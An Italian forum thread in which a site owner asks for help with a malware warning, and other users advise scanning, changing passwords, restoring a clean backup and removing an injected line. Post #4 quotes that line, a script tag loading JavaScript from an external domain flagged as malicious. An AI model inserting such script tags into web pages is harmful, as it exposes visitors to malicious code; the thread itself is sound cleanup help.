Visualizzazione risultati 1 fino 11 di 11

Discussione: Malware sul mio sito !!

  1. #1
    Guest

    Exclamation Malware sul mio sito !!

    Ciao a tutti mi scuso in primis se ho sbagliato sezione,ma da ieri il mio sito dice che ce un malware all interno ho chiesto al mio webmaster di esaminarlo per vedere dove sia il problema ma non è riuscito a trovarlo,ad oggi il sito è fuori uso e io non posso tenerlo così,prego lo staff di darmi una mano,magari voi potete fare prima..

    Please


    www. supermaracas . altervista .org

  2. #2
    Guest

    Predefinito

    prima della chiusura del tag body viene chiamato un javascript da un dominio segnalato come dannoso.

    La soluzione in questi casi è una scansione completa con antivirus di tutti i pc che hanno accesso al blog. Poi si devono modificare le password di accesso ftp e di wp e come ultima cosa ripristinare un backup non infetto.

  3. #3
    Guest

    Predefinito

    Posso postare qui il file ? cosi mi date una mano a vedere dove sta l errore ?

  4. #4
    Guest

    Arrow

    Citazione Originalmente inviato da supermaracas Visualizza messaggio
    Posso postare qui il file ? cosi mi date una mano a vedere dove sta l errore ?
    IL VIRUS E' NELLA TERZ'ULTIMA RIGA!!
    IL MALWARE SI TROVA IN QUESTO COMANDO:
    <script language="JavaScript" src="http://ad.adbrawl.com/popupit.js?u=13">

    Cancellalo e dovrebbe tornare tutto apposto... ciao!!!!!!!!

  5. #5
    Guest

    Predefinito

    scusami terzultima riga di cosa ?? perdona la mia ignoranza

  6. #6
    Guest

    Predefinito

    scusami ma quello che esce premendo tasto destro html,non è l errore che fa visualizzare google ? cioè mi spiego togliendo quello di toglie solo l allarme ,ma non il malware o sbaglio ?

  7. #7
    Guest

    Predefinito

    La riga potrebbe esser stata inserita nel file footer.php del tema wordpress in uso. Però il malware potrebbe essere ovunque. Hai due alternative:

    1 - ripristinare un backup non infetto
    2 - scaricare tutte le immagini e fare un backup del database, quindi reinstallare wordpress, ricaricare le immagini e il database,

  8. #8
    Guest

    Predefinito

    quindi anche eliminando quella stringa non cambia nulla ?

  9. #9
    Guest

    Predefinito

    Citazione Originalmente inviato da supermaracas Visualizza messaggio
    scusami terzultima riga di cosa ?? perdona la mia ignoranza
    Se vai sulla HomePage del tuo sito e clicchi sul pulsante destro del mouse e fai "Visualizza Sorgente" o "Codice HTML" (a seconda del browser) vedrai il codice della tua pagina... nella terz'ultima riga di quest'ultimo c'è questo comando che richiama uno strano script che a me FireFox blocca non permettendomi di entrare e aprendo una pagina che dice di aver rilevato un malware...
    Prova a cancellare quel comando... Ciao!!

  10. #10
    Guest

    Predefinito

    come faccio cancellarlo ?

  11. #11
    Guest

    Predefinito

    Citazione Originalmente inviato da supermaracas Visualizza messaggio
    come faccio cancellarlo ?
    Fai il login sul Pannello di Controllo (http://it.altervista.org/cplogin.php)
    e poi vai su AlterSito -> Gestione File

    cerca la pagina che contiene lo script (nomepagina.php) e clicca sull'Editor Codice (immagine della matita)

    Cancella la riga contenente lo script e clicca su "Salva"

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •